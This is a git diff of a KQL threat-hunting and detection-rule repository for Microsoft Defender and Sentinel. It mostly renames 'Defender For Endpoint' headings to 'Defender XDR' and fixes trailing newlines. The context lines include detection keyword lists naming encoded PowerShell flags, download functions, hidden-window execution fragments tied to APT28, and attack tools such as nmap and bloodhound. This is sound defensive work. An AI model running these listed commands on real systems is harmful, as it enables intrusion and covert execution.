b/Office 365/ListSafeLinkEvents.md @@ -13,7 +13,7 @@ A phishing campaign has started and a user has clicked the url, the URL is block #### References - https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-links-about?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ``` UrlClickEvents | where ActionType == "ClickBlocked" 
diff --git a/Office 365/Visualization - Email - MalwareDetectionReasons.md b/Office 365/Visualization - Email - MalwareDetectionReasons.md index ba12b8c..e89e732 100644 --- a/Office 365/Visualization - Email - MalwareDetectionReasons.md +++ b/Office 365/Visualization - Email - MalwareDetectionReasons.md @@ -8,7 +8,7 @@ This query visualizes the malware detection reasons in a piechart. This is based #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | where ThreatTypes == "Malware" @@ -23,4 +23,4 @@ EmailPostDeliveryEvents | extend DetectionMethod = tostring(extract(@'Malware":\["(.*?)"]', 1, DetectionMethods)) | summarize TotalEvents = count() by DetectionMethod | render piechart with(title="Malware Detection Reason Overview") -``` \ No newline at end of file +``` diff --git a/Office 365/Visualization - Email - PhishDetectionReasons.md b/Office 365/Visualization - Email - PhishDetectionReasons.md index f53a618..8be9bb2 100644 --- a/Office 365/Visualization - Email - PhishDetectionReasons.md +++ b/Office 365/Visualization - Email - PhishDetectionReasons.md @@ -8,7 +8,7 @@ This query visualizes the phishing detection reasons in a piechart. This is base #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | where ThreatTypes == "Phish" @@ -23,4 +23,4 @@ EmailPostDeliveryEvents | extend DetectionMethod = tostring(extract(@'Phish":\["(.*?)"]', 1, DetectionMethods)) | summarize TotalEvents = count() by DetectionMethod | render piechart with(title="Phishing Detection Reason Overview") -``` \ No newline at end of file +``` 
diff --git a/Office 365/Visualization - Email - PostDeliveryEvents.md b/Office 365/Visualization - Email - PostDeliveryEvents.md index 5bacb2a..c37c95c 100644 --- a/Office 365/Visualization - Email - PostDeliveryEvents.md +++ b/Office 365/Visualization - Email - PostDeliveryEvents.md @@ -8,7 +8,7 @@ This query visualizes the post dilivery events from exchange to view the status #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailpostdeliveryevents-table?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL EmailPostDeliveryEvents | summarize TotalEvents = count() by Action @@ -19,4 +19,4 @@ EmailPostDeliveryEvents EmailPostDeliveryEvents | summarize TotalEvents = count() by Action | render piechart with(title="Post Delivery Events") -``` \ No newline at end of file +``` diff --git a/README.md b/README.md index f4081f6..d1c7b1e 100644 --- a/README.md +++ b/README.md @@ -110,7 +110,7 @@ The *[Detection Template](./DetectionTemplate.md)* can be used to standardize th If your repository is not yet listed, feel free to create a pull request (PR) or reach out via message to have it added. # Where to use KQL in Defender For Endpoint & Sentinel? -## Defender For Endpoint +## Defender XDR * Open [security.microsoft.com](https://www.security.microsoft.com) * Hunting * Advanced Hunting diff --git a/Security Operations/ComparisonIntuneandMDEDevices.md b/Security Operations/ComparisonIntuneandMDEDevices.md index a9a9a02..e9867fc 100644 --- a/Security Operations/ComparisonIntuneandMDEDevices.md +++ b/Security Operations/ComparisonIntuneandMDEDevices.md @@ -20,4 +20,4 @@ IntuneDevices | summarize arg_max(TimeGenerated, DeviceName, LastContact) by DeviceId | extend MDEStatus = iff(DeviceName in~ (MDEDevices), "MDE Onboarded", "Not Onboarded") | summarize Total = count(), Devices = make_set(DeviceName) by MDEStatus -``` \ No newline at end of file +``` 
diff --git a/Security Operations/DevicesCanBeOnboarded.md b/Security Operations/DevicesCanBeOnboarded.md index 291d043..535c065 100644 --- a/Security Operations/DevicesCanBeOnboarded.md +++ b/Security Operations/DevicesCanBeOnboarded.md @@ -11,7 +11,7 @@ Devices that are not onboarded can be misused without detection. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-machines-onboarding?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let RecentDetection = 10d; DeviceInfo @@ -28,4 +28,4 @@ DeviceInfo | summarize arg_max(TimeGenerated, *) by DeviceId | where OnboardingStatus == "Can be onboarded" | summarize TotalDevices = dcount(DeviceId), DeviceNames = make_set(DeviceName) by OSPlatform, DeviceType -``` \ No newline at end of file +``` diff --git a/Security Operations/OnboardedDeviceByOS.md b/Security Operations/OnboardedDeviceByOS.md index 6dd5d39..a444b40 100644 --- a/Security Operations/OnboardedDeviceByOS.md +++ b/Security Operations/OnboardedDeviceByOS.md @@ -8,7 +8,7 @@ This query lists how many devices have been onboarded per operating system. #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/onboard-configure?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL DeviceInfo | where OnboardingStatus == "Onboarded" @@ -21,4 +21,4 @@ DeviceInfo | where OnboardingStatus == "Onboarded" | summarize arg_max(Timestamp, *) by DeviceId | summarize TotalDevices = count() by OSPlatform -``` \ No newline at end of file +``` diff --git a/Security Operations/README.md b/Security Operations/README.md index 786ef61..9cea625 100644 --- a/Security Operations/README.md +++ b/Security Operations/README.md 
@@ -1 +1 @@ -This folder provides KQL queries that can be used to get insights into the SOC operations. They provide visualisations and statistics. \ No newline at end of file +This folder provides KQL queries that can be used to get insights into the SOC operations. They provide visualisations and statistics. diff --git a/Security Operations/Statistics - MostTriggeredIncidents.md b/Security Operations/Statistics - MostTriggeredIncidents.md index 2c39157..52d0739 100644 --- a/Security Operations/Statistics - MostTriggeredIncidents.md +++ b/Security Operations/Statistics - MostTriggeredIncidents.md @@ -5,7 +5,7 @@ #### Description The results of this query provide insight in the top 10 incidents that have triggered in your selected *timeframe*, this can give indications on which incidents should be addressed to limit potential false positives. -## Defender For Endpoint +## Defender XDR ```KQL // Timeframe to collect incident statistics let timeframe = 7d; @@ -28,4 +28,4 @@ SecurityIncident // Get the alert statistics | summarize Triggers = count(), AlertIds = make_set(IncidentNumber) by Title | top 10 by Triggers -``` \ No newline at end of file +``` diff --git a/Security Operations/Statistics - MostTriggeredMitreTechniques.md b/Security Operations/Statistics - MostTriggeredMitreTechniques.md index e2e7c7e..6e28e08 100644 --- a/Security Operations/Statistics - MostTriggeredMitreTechniques.md +++ b/Security Operations/Statistics - MostTriggeredMitreTechniques.md @@ -5,7 +5,7 @@ #### Description The results of this query provide insight in the top 10 MITRE ATT&CK Techniques that have been triggered in the past 10 days. This can indicate that adversaries use specific techniques to gain access to your environment. On the otherhand if this information is combined with FP/BP statistics it can give insight into the detections that need to be improved. -## Defender For Endpoint +## Defender XDR ```KQL let timeframe = 7d; AlertInfo 
@@ -32,4 +32,4 @@ SecurityIncident | mv-expand MitreTechnique | summarize TriggerCount = count() by tostring(MitreTechnique) | top 10 by TriggerCount -``` \ No newline at end of file +``` diff --git a/Security Operations/TotalEventsByTable.md b/Security Operations/TotalEventsByTable.md index 731d93a..46e5471 100644 --- a/Security Operations/TotalEventsByTable.md +++ b/Security Operations/TotalEventsByTable.md @@ -12,4 +12,4 @@ union * | where TimeGenerated > startofday(ago(TimeFrame)) | summarize TotalEvents = count() by Type | sort by TotalEvents asc -``` \ No newline at end of file +``` diff --git a/Security Operations/Visualization - AntivirusEventsByDay.md b/Security Operations/Visualization - AntivirusEventsByDay.md index f756b58..5918741 100644 --- a/Security Operations/Visualization - AntivirusEventsByDay.md +++ b/Security Operations/Visualization - AntivirusEventsByDay.md @@ -4,7 +4,7 @@ This query visualizes the daily antivirus detections, which can give an indication in anomalous amount of activities that are performed in your environment. -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where Timestamp > ago(30d) diff --git a/Security Operations/Visualization - DailyIncidentTriggers.md b/Security Operations/Visualization - DailyIncidentTriggers.md index ed878d0..124c9ec 100644 --- a/Security Operations/Visualization - DailyIncidentTriggers.md +++ b/Security Operations/Visualization - DailyIncidentTriggers.md @@ -5,7 +5,7 @@ #### Description Visualize the daily triggers in MDE or Sentinel in a columnchart. This can give insight into spikes in the amount of triggers. -## Defender For Endpoint +## Defender XDR ```KQL AlertInfo | where Timestamp > ago(30d) @@ -23,4 +23,4 @@ SecurityIncident | summarize arg_min(TimeGenerated, *) by IncidentNumber | summarize Total = count() by bin(TimeGenerated, 1d) | render columnchart with(title="Incident triggers last 30 days") -``` \ No newline at end of file +``` 
diff --git a/Security Operations/Visualization - DailyTableEvents.md b/Security Operations/Visualization - DailyTableEvents.md index 5255727..e309e5d 100644 --- a/Security Operations/Visualization - DailyTableEvents.md +++ b/Security Operations/Visualization - DailyTableEvents.md @@ -10,7 +10,7 @@ Mainly important for Sentinel users is to get insight into the amount of traffic ### References - https://learn.microsoft.com/en-us/azure/sentinel/billing-monitor-costs -## Defender For Endpoint +## Defender XDR ```KQL let TimeRange = 10d; search * @@ -28,4 +28,4 @@ search * | project Timestamp, $table | summarize Events = count() by $table, bin(Timestamp, 1d) | render columnchart with (title="Total Daily Events", kind=stacked) -``` \ No newline at end of file +``` diff --git a/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md b/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md index e1f4c0f..6675d35 100644 --- a/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md +++ b/Security Operations/Visualization - ThreatIntelligenceThreatTypes.md @@ -15,4 +15,4 @@ The query can be used to visualize the different threat types you get from the M ThreatIntelligenceIndicator | summarize Total = count() by ThreatType | render piechart with(title="Threat Intelligence Threat Types") -``` \ No newline at end of file +``` diff --git a/Security Operations/XDRAutomaticallyClosedIncidents.md b/Security Operations/XDRAutomaticallyClosedIncidents.md index 9f94063..07d924d 100644 --- a/Security Operations/XDRAutomaticallyClosedIncidents.md +++ b/Security Operations/XDRAutomaticallyClosedIncidents.md @@ -16,4 +16,4 @@ SecurityIncident | where Status == "Closed" and Classification == "Undetermined" | where isempty(OwnerObjectID) | where isnotempty(ClassificationComment) -``` \ No newline at end of file +``` diff --git a/SecurityEvents/NltestDiscovery.md b/SecurityEvents/NltestDiscovery.md index 597db20..5a11395 100644 
--- a/SecurityEvents/NltestDiscovery.md +++ b/SecurityEvents/NltestDiscovery.md @@ -32,4 +32,4 @@ SecurityEvent | where ParsedCommandLine has_any (NLTestParameters) | summarize TotalQueries = count(), TotalUniqueQueries = dcount(CommandLine), Commands = make_set(CommandLine, 100) by Computer, Account, bin(TimeGenerated, BinSize) | where TotalQueries >= Threshold -``` \ No newline at end of file +``` diff --git a/Sentinel/AnalyticsRulesEfficiency.md b/Sentinel/AnalyticsRulesEfficiency.md index 981efd9..945a6fa 100644 --- a/Sentinel/AnalyticsRulesEfficiency.md +++ b/Sentinel/AnalyticsRulesEfficiency.md @@ -34,4 +34,4 @@ SecurityIncident by tostring(RelatedAnalyticRuleIds), Title // Sort by incidents that do not trigger malicious activities | sort by TotalFalsePositive, TotalIncidentsTriggered -``` \ No newline at end of file +``` diff --git a/Sentinel/ListGlobalAdmins.md b/Sentinel/ListGlobalAdmins.md index 447bbbc..17840eb 100644 --- a/Sentinel/ListGlobalAdmins.md +++ b/Sentinel/ListGlobalAdmins.md @@ -15,4 +15,4 @@ IdentityInfo | where AssignedRoles contains "Global Admin" | distinct AccountName, AccountDomain, AccountUPN, AccountSID // If PIM is enabled for Global Admins the list shows only the Global Admins that have used PIM to gain the privileges. -``` \ No newline at end of file +``` diff --git a/Sentinel/SentinelAnomalies.md b/Sentinel/SentinelAnomalies.md index a51d518..101f435 100644 --- a/Sentinel/SentinelAnomalies.md +++ b/Sentinel/SentinelAnomalies.md @@ -15,4 +15,4 @@ Anomalies | where TimeGenerated > ago(TimeFrame) | project-rename ['Anomaly Reason'] = Description | project-reorder TimeGenerated, ['Anomaly Reason'], Entities, RuleName, Tactics -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/AzureHound.md b/Sentinel/Summary Rules/AzureHound.md index 9b4c3c9..fbccbb6 100644 --- a/Sentinel/Summary Rules/AzureHound.md +++ b/Sentinel/Summary Rules/AzureHound.md 
@@ -1,3 +1,3 @@ # AzureHound Detection -For AzureHound see [AzureHound Detection](../../Graph%20API/AzureHound.md) \ No newline at end of file +For AzureHound see [AzureHound Detection](../../Graph%20API/AzureHound.md) diff --git a/Sentinel/Summary Rules/EntraGroupMembershipReport.md b/Sentinel/Summary Rules/EntraGroupMembershipReport.md index a3beddc..a5007fa 100644 --- a/Sentinel/Summary Rules/EntraGroupMembershipReport.md +++ b/Sentinel/Summary Rules/EntraGroupMembershipReport.md @@ -19,4 +19,4 @@ IdentityInfo | mv-expand GroupMembership | summarize TotalMemberships = dcount(tostring(GroupMembership)), MemberOf = make_set(tostring(GroupMembership), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/EntraRolesReport.md b/Sentinel/Summary Rules/EntraRolesReport.md index d641c95..45ab163 100644 --- a/Sentinel/Summary Rules/EntraRolesReport.md +++ b/Sentinel/Summary Rules/EntraRolesReport.md @@ -20,4 +20,4 @@ IdentityInfo | where isnotempty(AssignedRoles) | summarize TotalRoles = dcount(tostring(AssignedRoles)), Roles = make_set(tostring(AssignedRoles), 100) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Sentinel/Summary Rules/README.md b/Sentinel/Summary Rules/README.md index 3d4d551..68c4989 100644 --- a/Sentinel/Summary Rules/README.md +++ b/Sentinel/Summary Rules/README.md @@ -2,4 +2,4 @@ This section is dedicated to sharing Sentinel Summary Rules Documentation: [Link](https://learn.microsoft.com/en-us/azure/sentinel/summary-rules) -Related Blog: [Use Cases For Sentinel Summary Rules](https://kqlquery.com/posts/sentinel-summary-rules/) \ No newline at end of file +Related Blog: [Use Cases For Sentinel Summary Rules](https://kqlquery.com/posts/sentinel-summary-rules/) 
diff --git a/Sentinel/Summary Rules/UniqueActions.md b/Sentinel/Summary Rules/UniqueActions.md index 1b6ae13..24a0626 100644 --- a/Sentinel/Summary Rules/UniqueActions.md +++ b/Sentinel/Summary Rules/UniqueActions.md @@ -22,4 +22,4 @@ union * | summarize TotalEvents = count() by Type, Action | extend RetrievalDate = StartDate | sort by Type -``` \ No newline at end of file +``` diff --git a/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md b/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md index 2ebaeca..fa8c722 100644 --- a/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md +++ b/Sentinel/Visualization - IncidentsTriggeredByMitreTactic.md @@ -21,4 +21,4 @@ SecurityIncident | summarize count() by MitreTactic | sort by count_ | render columnchart with (title="Incidents triggered by MITRE ATT&CK Tactics", ytitle="Incidents Triggered") -``` \ No newline at end of file +``` diff --git a/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md b/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md index d03b7c1..e183b1c 100644 --- a/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md +++ b/Sentinel/Visualization - IncidentsTriggeredByMitreTechniques.md @@ -26,4 +26,4 @@ SecurityIncident // Count the total incidents by tactic and technique | summarize count() by MitreTactic, MitreTechnique | render columnchart with (title="MITRE ATT&CK Techniques triggered by Tactic", ytitle="Total Incidents") -``` \ No newline at end of file +``` diff --git a/Threat Hunting Cases/HTTP Traffic.md b/Threat Hunting Cases/HTTP Traffic.md index 0bf14fe..0e0e90f 100644 --- a/Threat Hunting Cases/HTTP Traffic.md +++ b/Threat Hunting Cases/HTTP Traffic.md 
@@ -6,7 +6,7 @@ This Threat Hunting case is based on the DeviceNetworkEvents table. The goal is The first step is to investigate the amount of HTTP requests and classify them by HTTP Method. This will give insights into the behaviour of your environment. -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents | where ActionType == "NetworkSignatureInspected" @@ -36,7 +36,7 @@ DeviceNetworkEvents The next step is to dive into the files that have been downloaded with HTTP GET requests. This is done by summarizing all file extensions that have been downloaded. -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents | where ActionType == "NetworkSignatureInspected" @@ -77,7 +77,7 @@ DeviceNetworkEvents Based on a shortlist we dive into the executable files that may contain suspicious/malicious content by listing all executable files that have been downloaded using HTTP. -### Defender For Endpoint +### Defender XDR ``` let ExecutableFileExtentions = dynamic(['bat', 'cmd', 'com', 'cpl', 'ex', 'exe', 'jse', 'lnk','msc', 'ps1', 'reg', 'vb', 'vbe', 'ws', 'wsf']); DeviceNetworkEvents @@ -118,7 +118,7 @@ DeviceNetworkEvents If you found a suspicious file you can use the filename to investigate this file, using the FileProfile function. This enables us to list the file information (ThreatName, GlobalPrevalence, Signer) and a list with devices and file locations. -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; DeviceFileEvents 
@@ -143,4 +143,4 @@ DeviceFileEvents ``` ## Found Something Interesting? -If you found malicious activities take a look at the [DFIR Queries](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/DFIR) they can help by the investigation of an incident. \ No newline at end of file +If you found malicious activities take a look at the [DFIR Queries](https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/DFIR) they can help by the investigation of an incident. diff --git a/Threat Hunting Cases/Suspicious Encoded Powershell.md b/Threat Hunting Cases/Suspicious Encoded Powershell.md index 45adf13..16be59a 100644 --- a/Threat Hunting Cases/Suspicious Encoded Powershell.md +++ b/Threat Hunting Cases/Suspicious Encoded Powershell.md @@ -6,7 +6,7 @@ Powershell can be used encoded to obfucstate the commands that have been execute In this step we list the devices that execute Powershell by the amount of encoded PowerShell commands executed. This can give an indication on which device needs to be investigated further. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let TimeFrame = 48h; //Customizable h = hours, d = days @@ -39,7 +39,7 @@ DeviceProcessEvents This is done by decoding the commands in order to be investigated. This is then listed by DeviceName the amount of unique queries that have been executed in the TimeFrame. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let TimeFrame = 48h; //Customizable h = hours, d = days 
@@ -78,7 +78,7 @@ DeviceProcessEvents The next step is to investigate if reconnaissance commands have been executed. The actor can hide the reconnaissance commands encoded to stay undetected. New items can be added to the ReconVariables list. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let ReconVariables = dynamic(['Get-ADGroupMember', 'Get-ADComputer', 'Get-ADUser', 'Get-NetGPOGroup', 'net user', 'whoami', 'net group', 'hostname', 'netsh firewall', 'tasklist', 'arp', 'systeminfo']); @@ -132,7 +132,7 @@ DeviceProcessEvents The last step is to investigate the connections that have been made via the encoded command. This can be C2 traffic or the download of a malicious tool that can be used by the actor. -### Defender For Endpoint +### Defender XDR ``` let EncodedList = dynamic(['-encodedcommand', '-enc']); // -e and -en can also be added, be aware of FPs let DownloadVariables = dynamic(['WebClient', 'DownloadFile', 'DownloadData', 'DownloadString', 'WebRequest', 'Shellcode', 'http', 'https']); diff --git a/Threat Hunting Cases/Suspicious SMB Sessions.md b/Threat Hunting Cases/Suspicious SMB Sessions.md index 37c168d..80c34a4 100644 --- a/Threat Hunting Cases/Suspicious SMB Sessions.md +++ b/Threat Hunting Cases/Suspicious SMB Sessions.md @@ -6,7 +6,7 @@ SMB can be used in various ways by attackers, such as accessing remote shares, t The first step is to get intsight in the devices that have the most unique SMB connections. There is a filter on Domain Controllers, because they normaly generate a lot of noise (via MDI), the filter can be removed if you want to include your Domain Controllers. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let AllDomainControllers = 
@@ -41,7 +41,7 @@ DeviceNetworkEvents In Windows some files are known to set up benign SMB sessions or to map shares. FileNames as nmap or bloodhound can be detected via this detection rule. This is done by counting the unique SMB sessions that have been generated by each file. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents @@ -68,7 +68,7 @@ Based on the output of step 2, the files that seem suspicious can be added to th # SMB Sessions by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let FileNames = dynamic(['nmap.exe', 'bloodhound.exe']); // Add your own findings in the list, these are examples @@ -94,7 +94,7 @@ DeviceNetworkEvents This step investigates all connections made by the devices that have created suspicious connections. Those devices can be collected based on the previous steps. The endresult will be a list with al the unique IPs that have been accessed. -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let SuspiciousDevices = dynamic(['server1.com', 'laptop1.com']); @@ -121,7 +121,7 @@ DeviceNetworkEvents This section is optional, since it only helps if you suspect that the actor has performed file copies. This query will list all file copies that have been performed by the accounts that have been collected in this Threat Hunting case. -### Defender For Endpoint +### Defender XDR ``` let WhitelistedAccounts = dynamic(['account1', 'account2']); diff --git a/Threat Hunting/Behavior - AsyncRATInitialAccess.md b/Threat Hunting/Behavior - AsyncRATInitialAccess.md index 1566791..e59cfa0 100644 --- a/Threat Hunting/Behavior - AsyncRATInitialAccess.md +++ b/Threat Hunting/Behavior - AsyncRATInitialAccess.md 
@@ -20,7 +20,7 @@ An malicious OneNote file was opened and resulted in running AsyncRAT - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/ - https://resources.infosecinstitute.com/topic/asyncrat-escapes-security-defenses/ -### Defender For Endpoint +### Defender XDR ``` EmailEvents diff --git a/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md b/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md index 09c127e..05fc526 100644 --- a/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md +++ b/Threat Hunting/Behavior - InboundConnectionFromMaliciousIP.md @@ -18,7 +18,7 @@ An adversary which uses a already flagged IP go scan your network for point of i - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/discovering-internet-facing-devices-using-microsoft-defender-for/ba-p/3778975 - https://github.com/stamparm/ipsum -### Defender For Endpoint +### Defender XDR ``` // Collect Threat Intel feed information from Ipsum (Level 4), more threat can be used. For examples see TI feeds on the page: https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules/tree/main/Threat%20Hunting diff --git a/Threat Hunting/Behavior - TelegramC2.md b/Threat Hunting/Behavior - TelegramC2.md index f16cbb9..9758341 100644 --- a/Threat Hunting/Behavior - TelegramC2.md +++ b/Threat Hunting/Behavior - TelegramC2.md @@ -20,7 +20,7 @@ An actor can use telgram as a Command & Control channel, while the attackers dis - https://cyware.com/news/malware-authors-leveraging-telegram-based-command-and-control-7010f17b - https://twitter.com/adamtheanalyst/status/1592561452803829760?s=46&t=0s88GjPSLLjtgcGdFsC9XQ -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Threat Hunting/Behaviour - APT28Commands.md b/Threat Hunting/Behaviour - APT28Commands.md index f2aa8c8..378a2d1 100644 --- a/Threat Hunting/Behaviour - APT28Commands.md +++ b/Threat Hunting/Behaviour - APT28Commands.md 
@@ -11,7 +11,7 @@ APT28 has gotten access to one of your devices and executes malicious payloads. #### References - https://cert.gov.ua/article/6276894 -## Defender For Endpoint +## Defender XDR ```KQL let APT28Commands = dynamic(['Get-Content', '-w hid -nop', '-windowstyle hidden -encodedCommand', 'start-process ssh.exe', 'Get-Content -Encoding', 'Compress-Archive', 'Get-WinEvent -FilterHashtable', 'net time', 'Get-ADDomainController', 'Get-DnsClientServerAddress', 'Get-NetAdapter', 'Get-NetAdapterBinding', 'Get-NetIPConfiguration', 'Resolve-DNSName', 'ipconfig /flushdns', 'net start dnscache', 'net stop dnscache']); let Threshold = 3; @@ -66,4 +66,4 @@ DeviceProcessEvents "Other") | summarize UniqueATP28Commands = dcount(CommandParameter), APT28CommandParameters = make_set(CommandParameter), UniqueCommands = dcount(ProcessCommandLine), Commandlines = make_set(ProcessCommandLine) by DeviceId, DeviceName, bin(TimeGenerated, BinSize) | where UniqueATP28Commands >= Threshold -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Behaviour - APT28ExternalWebdav.md b/Threat Hunting/Behaviour - APT28ExternalWebdav.md index f7ee8cf..de8f223 100644 --- a/Threat Hunting/Behaviour - APT28ExternalWebdav.md +++ b/Threat Hunting/Behaviour - APT28ExternalWebdav.md @@ -19,7 +19,7 @@ APT28 has gotten access to one of your devices and executes malicious payloads. #### References - https://cert.gov.ua/article/6276894 -## Defender For Endpoint +## Defender XDR ```KQL let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; DeviceProcessEvents @@ -38,4 +38,4 @@ DeviceProcessEvents | where isnotempty(RemoteIP) | where not(ipv4_is_private(RemoteIP)) | project-reorder DeviceName, RemoteIP, ProcessCommandLine, AccountUpn -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Behaviour - KillSQLProcesses.md b/Threat Hunting/Behaviour - KillSQLProcesses.md index a59eb13..6bdf243 100644 --- a/Threat Hunting/Behaviour - KillSQLProcesses.md 
+++ b/Threat Hunting/Behaviour - KillSQLProcesses.md @@ -24,7 +24,7 @@ An adversary kills all SQL processes before deploying ransomware on the servers #### References - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a -## Defender For Endpoint +## Defender XDR ```KQL let TotalKilledThreshold = 10; let TotalParametersThreshold = 10; @@ -59,4 +59,4 @@ DeviceProcessEvents | extend TotalKilledProcesses = array_length(AllKilledProcess) | project-reorder TimeGenerated, ProcessCommandLine, TotalParameters, TotalKilledProcesses | where TotalKilledProcesses >= TotalKilledThreshold and TotalParameters >= TotalParametersThreshold -``` \ No newline at end of file +``` diff --git a/Threat Hunting/IOC - BlackCatRansomware.md b/Threat Hunting/IOC - BlackCatRansomware.md index 0c2a30c..e7c25fa 100644 --- a/Threat Hunting/IOC - BlackCatRansomware.md +++ b/Threat Hunting/IOC - BlackCatRansomware.md @@ -4,7 +4,7 @@ #### IOC Source: https://www.ic3.gov/Media/News/2022/220420.pdf #### Publish Date: 19 April 2022 -### Defender For Endpoint +### Defender XDR ```KQL let MD5_IOCs = dynamic(['861738dd15eb7fb50568f0e39a69e107', '9f60dd752e7692a2f5c758de4eab3e6f', '09bc47d7bc5e40d40d9729cec5e39d73', diff --git a/Threat Hunting/IOC - CiscoYanluowangRansomware.md b/Threat Hunting/IOC - CiscoYanluowangRansomware.md index 9017d9b..a694339 100644 --- a/Threat Hunting/IOC - CiscoYanluowangRansomware.md +++ b/Threat Hunting/IOC - CiscoYanluowangRansomware.md @@ -4,7 +4,7 @@ #### IOC Source: https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html #### Publish Date: 10 August 2022 -### Defender For Endpoint +### Defender XDR ``` // based on https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html diff --git a/Threat Hunting/IOC - NighthawkRat.md b/Threat Hunting/IOC - NighthawkRat.md index 286f5aa..edd29a6 100644 --- a/Threat Hunting/IOC - NighthawkRat.md +++ b/Threat Hunting/IOC - NighthawkRat.md 
@@ -3,7 +3,7 @@ #### IOC Source: https://raw.githubusercontent.com/fboldewin/YARA-rules/master/nighthawk.yar #### Publish Date: 22 November 2022 -### Defender For Endpoint +### Defender XDR ``` let NighthawkRat = dynamic(['0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988', '9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8', '38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf', 'f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e', 'b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94']); diff --git a/Threat Hunting/Ransomware - APTNotesJoinTable.md b/Threat Hunting/Ransomware - APTNotesJoinTable.md index 14a169c..97ccee5 100644 --- a/Threat Hunting/Ransomware - APTNotesJoinTable.md +++ b/Threat Hunting/Ransomware - APTNotesJoinTable.md @@ -1,6 +1,6 @@ # APTNotes table that can be used to join with other data connectors ---- -### Defender For Endpoint +### Defender XDR ``` let APTInfo = externaldata(Filename: string, Title: string, Source: @@ -19,4 +19,4 @@ with (format="csv", ignoreFirstRecord=True); APTInfo | where Year > 2015 -``` \ No newline at end of file +``` diff --git a/Threat Hunting/Ransomware - APTNotesSHA1IOC.md b/Threat Hunting/Ransomware - APTNotesSHA1IOC.md index 349e4be..d737aed 100644 --- a/Threat Hunting/Ransomware - APTNotesSHA1IOC.md +++ b/Threat Hunting/Ransomware - APTNotesSHA1IOC.md @@ -8,7 +8,7 @@ This query uses a external csv that contains APT Ransomware note hashes. This li #### Risk An Threat Actor is deploying ransomware in your environment. -## Defender For Endpoint +## Defender XDR ```KQL let APTInfo = externaldata(Filename: string, Title: string, Source: string, Link: string, SHA1: string, Date: datetime, Year: int)[@"https://raw.githubusercontent.com/aptnotes/data/master/APTnotes.csv"] @@ -47,4 +47,4 @@ DeviceFileEvents InitiatingProcessCommandLine, SHA1 -``` \ No newline at end of file +``` 
